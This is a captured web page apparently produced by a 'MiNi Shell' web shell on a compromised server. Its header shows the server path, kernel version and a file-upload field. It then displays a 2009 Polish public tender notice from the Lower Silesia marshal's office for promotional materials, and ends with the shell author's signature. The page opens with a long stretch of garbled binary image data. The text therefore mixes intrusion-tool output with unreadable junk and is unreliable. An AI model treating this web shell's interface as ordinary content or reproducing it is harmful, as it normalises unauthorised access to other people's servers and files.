JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091009/353650-N-2009.html

<p class="kh_header"><b>Wrocław: Wykonanie i dostawa  materiałów informacyjno-promocyjnych 
dotyczących Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 (RPO WD)</b><br>
<b>Numer ogłoszenia: 353650 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Dolnośląskie - Urząd Marszałkowski Województwa Dolnośląskiego , ul. Wybrzeże J. Słowackiego 12-14, 50-411 Wrocław, woj. dolnośląskie, tel. 071 7769397,7769703-05,7779229, faks 071 7769141, 7769702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i dostawa  materiałów informacyjno-promocyjnych 
dotyczących Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 (RPO WD).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i dostawa materiałów informacyjno-promocyjnych dotyczących Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.
1.	Pamięć USB
a)	liczba sztuk-600,
b)	obudowa- metalowa, w kształcie prostokąta o wymiarach max 20 x 75 mm,
c)	pojemność- 2 GB,
d)	nadruk
-	metoda nadruku- grawer laserowy, 
-	wielkość nadruku min. 15 x 40 mm
-	treść-
-	zestawienie znaków graficznych- logo Narodowej Strategii Spójności w formie znaku programu regionalnego, flaga Unii Europejskiej, dodatkowo, jeśli technika wykonania umożliwi czytelne wykonanie znaków: herb województwa dolnośląskiego i słowne odwołanie do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego przy fladze UE,
-	adres strony internetowej: www.rpo.dolnyslask.pl.
2.	ROLL UP-
a)	liczba sztuk- 2,
b)	wymiary-  2 m x 1 m (+, - 15 %),
c)	materiał nośnika- gładki BLOCK OUT lub równoważny (nie przepuszczający światła),
d)	nadruk-
-	druk cyfrowy, jednostronny, pełen kolor wydruku,
-	treść-
	zestawienie znaków graficznych: logo Narodowej Strategii Spójności w formie znaku programu regionalnego, logo województwa dolnośląskiego, logo Unii Europejskiej ze słownym odwołaniem do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego, 
-	adres strony internetowej- www.rpo.dolnyslask.pl,
-	informacja o współfinansowaniu- Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz z budżetu Samorządu Województwa Dolnośląskiego w ramach Pomocy Technicznej Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013,
-	hasło-Fundusze Europejskie - dla rozwoju Dolnego Śląska,
-	tekst dostarczony przez Zamawiającego,
e)	podstawa- aluminiowa, konstrukcja składana, kaseta chroniąca grafikę,
f)	torba transportowa i stojak w komplecie, 
g)	nośnik i druk odporny na wodę i promienie UV,
h)	Wykonawca opracuje min. 3 projekty graficzne każdego roll up-u, z których Zamawiający wybierze dwa do realizacji, Zamawiający ma prawo do dwóch korekt projektu, Wykonawca zobowiązany jest do dwóch korekt autorskich.
3.	Pasek odblaskowy-
a)	liczba sztuk - 500,
b)	wymiary-  250-320 x 30 mm (+, - 15 %),
c)	materiał-tworzywo sztuczne, pasek elastyczny, samozaciskowy,
d)	Wykonawca opracuje min. 3 projekty graficzne, z których Zamawiający wybierze jeden do realizacji,
e)	nadruk-
-	wielkość nadruku- min. 80% powierzchni,
-	treść- 
-	zestawienie znaków graficznych- logo Narodowej Strategii Spójności w formie znaku programu regionalnego, logo województwa dolnośląskiego, logo Unii Europejskiej ze słownym odwołaniem do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego,
-	adres strony internetowej- www.rpo.dolnyslask.pl.
4.	Kubki 
a)	liczba sztuk-1000,
b)	pojemność- 250 ml do 300 ml,
c)	kubek o kształcie walca z jednym uchwytem, kolorowe szkło szronione lub porcelana, termoodporne,
d)	nadruk- 
-	jednokolorowy (srebrny) na kolorowym szkle szronionym lub pełny kolor na porcelanie, odporny na ścieranie,
-	treść 
-	zestawienie znaków graficznych- logo Narodowej Strategii Spójności w formie znaku programu regionalnego, logo województwa dolnośląskiego, logo Unii Europejskiej ze słownym odwołaniem do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego,
-	adres strony internetowej www.rpo.dolnyslask.pl.
e)	opakowanie- zbiorcze, po 6 sztuk,
f)	Wykonawca opracuje min. 3 projekty graficzne, z których Zamawiający wybierze jeden do realizacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie niniejszego zamówienia mogą się ubiegać Wykonawcy, którzy:
1)posiadają uprawnienia niezbędne do wykonywania działalności lub czynności, zgodnie z wymaganiami ustawowymi, 
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a)w zakresie niezbędnej wiedzy i doświadczenia - w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia ich działalności jest krótszy - w tym okresie -wykonali  minimum jedną dostawę odpowiadającą swoim rodzajem i wartością dostawie stanowiącej przedmiot niniejszego zamówienia, tj. wykonali należycie zamówienie związane z wykonaniem i dostawą materiałów informacyjno-promocyjnych opatrzonych nadrukiem (logotypy, znaki graficzne, teksty, itp.), o wartości nie mniejszej niż 25.000,00 zł brutto. 
W przypadku, gdy Wykonawca zrealizował w/w dostawę w innej walucie niż PLN, to wówczas Zamawiający do przeliczenia wartości w zł będzie stosował średni kurs NBP dla danej waluty z dnia wszczęcia postępowania. 
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
na podstawie art. 24 ust. 1 i 2 ustawy.
2.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o zamówienie. Przy ocenie spełniania warunków przez osoby wspólnie składające ofertę Zamawiający przyjmie, że wymagania, o których mowa w pkt. 1.1) - 1.3), mogą spełniać tylko niektórzy z tych Wykonawców, tak, by sumarycznie w odniesieniu do wszystkich tych Wykonawców były spełnione łącznie. Wymagania, o których mowa w pkt. 1.4), każdy z Wykonawców musi spełnić osobno.
3.Ocena spełniania warunków udziału w postępowaniu, określonych w pkt. 1, dokonana zostanie zgodnie z formułą -spełnia - nie spełnia-w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w rozdziale VI niniejszej SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, 
iż ww. warunki Wykonawca spełnił.
4.Niespełnienie któregokolwiek z warunków udziału w postępowaniu, o których mowa w pkt. 1, skutkować będzie wykluczeniem Wykonawcy z postępowania oraz odrzuceniem złożonej przez niego oferty, z zastrzeżeniem art. 26 ust. 3 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wykonawca składa wraz z ofertą następujące dokumenty:
1)Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu 
na podstawie art. 22 ust 1 pkt 1-4 (wzór oświadczenia stanowi Załącznik nr 2 
do SIWZ). 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,  Wykonawcy mogą złożyć oświadczenie wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie) lub każdy z nich na odrębnym dokumencie.
2)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, a jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej - dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku, gdy Wykonawcą jest podmiot zobowiązany do rejestracji 
w Krajowym Rejestrze Sądowym, a w załączonym odpisie z rejestru nie uwzględniono zmian w tekście dokumentu, Wykonawca dodatkowo zobowiązany jest do dołączenia do oferty dowodu złożenia ww. zmian w sądzie rejestrowym.
3)Wykaz dostaw, o których mowa w rozdziale V pkt. 1.2) lit. a) niniejszej SIWZ, wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców (wzór wykazu dostaw stanowi załącznik nr 3 do SIWZ). 
4)Dokumenty potwierdzające, że dostawy przedstwione w wykazie, o którym mowa w ppkt. 3), zostały wykonane należycie (np.: protokoly odbioru, referencje).
2.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Terminy wystawienia stosuje się odpowiednio.
3.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia publicznego ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu lub do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
4.Jeżeli oferta Wykonawców, o których mowa w pkt. 3, zostanie uznana za najkorzystniejszą, przed zawarciem umowy w sprawie zamówienia publicznego przedłożą oni Zamawiającemu umowę regulującą współpracę tych Wykonawców, zawierającą w swojej treści co najmniej następujące postanowienia:
a)zawiązania porozumienia co najmniej na czas nie krótszy niż czas trwania umowy w sprawie zamówienia publicznego,
b)wskazanie Pełnomocnika,
c)zapis o wspólnej i solidarnej odpowiedzialności w zakresie realizowanego zamówienia,
d)zakaz zmiany Partnerów (Wykonawców) wspólnie realizujących dane zamówienie publiczne w trakcie obowiązywania umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.umwd.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Dolnośląskiego Wybrzeże J. Słowackiego 12-14, 50-411 Wrocław, wejście od ul.Mazowieckiej 15 pokój 124.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2009 godzina 11:00, miejsce: Urząd Marszałkowski Województwa Dolnośląskiego Wybrzeże J. Słowackiego 12-14, 50-411 Wrocław, pokój 101.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com